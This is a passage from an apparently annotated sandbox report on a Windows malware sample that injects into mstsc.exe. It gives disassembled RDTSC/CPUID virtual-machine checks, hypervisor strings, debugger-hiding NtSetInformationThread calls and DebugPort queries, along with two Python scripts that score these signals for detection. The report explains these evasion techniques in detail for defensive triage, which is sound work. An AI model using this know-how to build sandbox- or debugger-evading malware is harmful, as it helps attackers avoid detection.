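        techniques.append("KUSER_SHARED_DATA SystemTime read")
    if loop:
        techniques.append("repeated measurement loop")
    if not techniques and len(rdtsc_idx) >= 2:
        techniques.append("bare rdtsc pair")

    return {
        "process": m.group("proc"),
        "first": int(m.group("first"), 16),
        "distance": int(m.group("second"), 16) - int(m.group("first"), 16),
        "rdtsc_count": len(rdtsc_idx),
        "cpuid_between_rdtsc": cpuid_between,
        "hypervisor_bit_check": hv_bit,
        "reads_kuser_systemtime": reads_systemtime,
        "loop": loop,
        "techniques": techniques,
    }


def triage(lines):
    """Classify every interceptor line; lines that are not interceptor evidence are skipped."""
    return [r for r in (classify(line) for line in lines) if r is not None]


# Three evidence lines copied from this report: the SystemTime/loop stub, the
# CPUID hypervisor-bit stub, and the short stub that also appears in mstsc.exe.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F43030 second address: 0000000004F43030 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FC0509987F8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007FC0509987FEh 0x00000021 test dh, bh 0x00000023 pop ecx 0x00000024 cmp bx, cx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007FC0509987C8h 0x0000002f cmp dx, ax 0x00000032 test dl, cl 0x00000034 push ecx 0x00000035 cmp cx, dx 0x00000038 call 00007FC05099881Fh 0x0000003d call 00007FC05099880Ah 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F43054 second address: 0000000004F43054 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FC050396BF1h 0x0000001f popad 0x00000020 call 00007FC0503969ACh 0x00000025 lfence 0x00000028 rdtsc",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        print(f"{r['process']} @ {r['first']:08X} (+{r['distance']}): {', '.join(r['techniques'])}")
```

Two reading notes for the evidence that follows. The four-instruction stubs at 0x..98E4 and 0x..9B4E are reported for both Details Transfer.exe and mstsc.exe at identical page offsets, which is consistent with the same code running inside mstsc.exe after injection. The Hyper-V and VMware strings listed next come mostly from explorer.exe memory dumps, i.e. the analysis host's own device paths and service names captured in a system process; on their own they say little about the sample's intent, whereas the qemu-ga.exe/qga.exe file-open probes and the CPUID/RDTSC stubs above are the sample's actual checks.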
Source: C:\Windows\explorer.exe TID: 5820 Thread sleep time: -52000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 6472 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW|
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000002.482640936.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
Source: Details Transfer.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000005.00000002.482708412.00000000056A1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.271690851.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000005.00000002.482610300.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000005.00000000.272076197.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.272254939.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Details Transfer.exe, 00000000.00000002.231977585.0000000004F9A000.00000004.00000001.sdmp, Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Details Transfer.exe, 00000002.00000002.302268856.000000000249A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000005.00000000.270223713.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Details Transfer.exe Process information queried: ProcessInformation

      Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40208 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,04F402A1,00000000,00000000,00000000 0_2_04F40208
Hides threads from debuggers
Source: C:\Users\user\Desktop\Details Transfer.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Details Transfer.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Details Transfer.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Details Transfer.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Details Transfer.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Details Transfer.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40208 rdtsc 0_2_04F40208
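The NtSetInformationThread call above passes information class 0x11, which is ThreadHideFromDebugger (17): the kernel stops delivering debug events for that thread, there is no user-mode call to clear the flag again, and an attached debugger simply never sees the thread's exceptions or breakpoints. The "Process queried: DebugPort" lines are NtQueryInformationProcess with ProcessDebugPort (7), the same query CheckRemoteDebuggerPresent performs, and the `fs:[30h]` reads listed further down fetch the PEB pointer from the 32-bit TEB, where BeingDebugged and NtGlobalFlag live. The script below is an added example, not Joe Sandbox or the sample's code: it turns evidence lines in this section's format into per-process anti-debug findings and a weighted verdict, decoding the raw information-class arguments itself. The sample lines are copied from or modelled on this section; the weights, the threshold and the label strings are assumptions made for the example.

```python
"""Score anti-debugging evidence per process from sandbox report lines.

Added example for this report; not Joe Sandbox, GuLoader or FormBook code.
The input lines are copied from, or modelled on, the evidence lines in this
section.  Weights and the verdict threshold are assumptions for illustration.
"""
import re
from collections import defaultdict

# Information-class values are fixed by the NT headers.
THREADINFOCLASS = {0x00: "ThreadBasicInformation", 0x11: "ThreadHideFromDebugger"}
PROCESSINFOCLASS = {
    0x07: "ProcessDebugPort",
    0x1E: "ProcessDebugObjectHandle",
    0x1F: "ProcessDebugFlags",
}

# Assumed weights: hiding threads is rarely done by benign code, a DebugPort
# query or an RDTSC read is suggestive, a PEB read on its own is common.
WEIGHTS = {
    "ThreadHideFromDebugger": 4,
    "ProcessDebugPort": 3,
    "ProcessDebugObjectHandle": 3,
    "ProcessDebugFlags": 3,
    "rdtsc timing": 2,
    "PEB access via fs:[30h]": 1,
}
VERDICT_THRESHOLD = 5  # assumption

SOURCE_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)")
CODEFN_RE = re.compile(r"Code function:\s*(?P<fn>\S+)\s+(?P<body>.*)$")
NT_CALL_RE = re.compile(r"^(?P<api>Nt\w+)\s+(?P<args>[0-9A-Fa-f?,]+)")


def decode_info_class(api, value):
    """Map the second argument of an Nt*Information{Thread,Process} call to its name."""
    if api.endswith("Thread"):
        table = THREADINFOCLASS
    elif api.endswith("Process"):
        table = PROCESSINFOCLASS
    else:
        table = {}
    return table.get(value, f"{api} class 0x{value:X}")


def classify_line(line):
    """Return (process, technique) for a line carrying an anti-debug signal, else None."""
    m = SOURCE_RE.match(line)
    if m is None:
        return None
    proc, rest = m.group("proc"), line[m.end():]
    # Behaviour lines: the sandbox has already decoded the API argument.
    if "Thread information set: HideFromDebugger" in rest:
        return proc, "ThreadHideFromDebugger"
    if "Process queried: DebugPort" in rest:
        return proc, "ProcessDebugPort"
    # Static "Code function" lines: decode the raw arguments ourselves.
    cf = CODEFN_RE.search(rest)
    if cf is None:
        return None
    body = cf.group("body")
    nt = NT_CALL_RE.match(body)
    if nt:
        args = nt.group("args").split(",")
        if len(args) > 1 and args[1] != "?":
            name = decode_info_class(nt.group("api"), int(args[1], 16))
            return (proc, name) if name in WEIGHTS else None
        return None
    # fs:[30h] is the PEB pointer in the 32-bit TEB; the PEB holds
    # BeingDebugged and NtGlobalFlag, the two classic debugger tells.
    if "fs:[00000030h]" in body:
        return proc, "PEB access via fs:[30h]"
    if re.search(r"\brdtsc\b", body):
        return proc, "rdtsc timing"
    return None


def score(lines):
    """Aggregate hits per process; each distinct technique is weighted once."""
    per_proc = defaultdict(lambda: defaultdict(int))
    for line in lines:
        hit = classify_line(line)
        if hit:
            proc, tech = hit
            per_proc[proc][tech] += 1
    report = {}
    for proc, techs in per_proc.items():
        total = sum(WEIGHTS[t] for t in techs)
        report[proc] = {
            "techniques": dict(techs),
            "score": total,
            "anti_debug": total >= VERDICT_THRESHOLD,
        }
    return report


# Constructed input: lines copied from or modelled on this section of the report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40208 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,04F402A1,00000000,00000000,00000000 0_2_04F40208",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40208 rdtsc 0_2_04F40208",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F433D0 mov eax, dword ptr fs:[00000030h] 0_2_04F433D0",
    r"Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3B967A LdrInitializeThunk, 2_2_1E3B967A",
]

if __name__ == "__main__":
    for proc, r in score(SAMPLE_LINES).items():
        print(f"{proc}: score={r['score']} anti_debug={r['anti_debug']} {r['techniques']}")
```

Note that mstsc.exe scores below the assumed threshold here only because this section attributes a single DebugPort query to it; taken together with the RDTSC stubs the report lists for mstsc.exe at the same page offsets as in the dropper, the injected copy is running the same checks.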
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3B967A LdrInitializeThunk, 2_2_1E3B967A
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F433D0 mov eax, dword ptr fs:[00000030h] 0_2_04F433D0
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F419C1 mov eax, dword ptr fs:[00000030h] 0_2_04F419C1
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40D16 mov eax, dword ptr fs:[00000030h] 0_2_04F40D16
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F42E78 mov eax, dword ptr fs:[00000030h] 0_2_04F42E78
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F4120F mov eax, dword ptr fs:[00000030h] 0_2_04F4120F
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F42B76 mov eax, dword ptr fs:[00000030h] 0_2_04F42B76
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E43AE44 mov eax, dword ptr fs:[00000030h] 2_2_1E43AE44
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E43AE44 mov eax, dword ptr fs:[00000030h] 2_2_1E43AE44
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E37E620 mov eax, dword ptr fs:[00000030h] 2_2_1E37E620
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3AA61C mov eax, dword ptr fs:[00000030h] 2_2_1E3AA61C
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3AA61C mov eax, dword ptr fs:[00000030h] 2_2_1E3AA61C
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h] 2_2_1E37C600
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h] 2_2_1E37C600
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E37C600 mov eax, dword ptr fs:[00000030h] 2_2_1E37C600
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3A8E00 mov eax, dword ptr fs:[00000030h] 2_2_1E3A8E00
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E39AE73
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E39AE73
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E39AE73
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E39AE73
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E39AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E39AE73
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E431608 mov eax, dword ptr fs:[00000030h] 2_2_1E431608
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E38766D mov eax, dword ptr fs:[00000030h] 2_2_1E38766D
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E387E41 mov eax, dword ptr fs:[00000030h] 2_2_1E387E41
Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E42FE3F mov eax, dword ptr fs:[00000030h] 2_2_1E42FE3F
      Source: C:\Users\user\Desktop\Details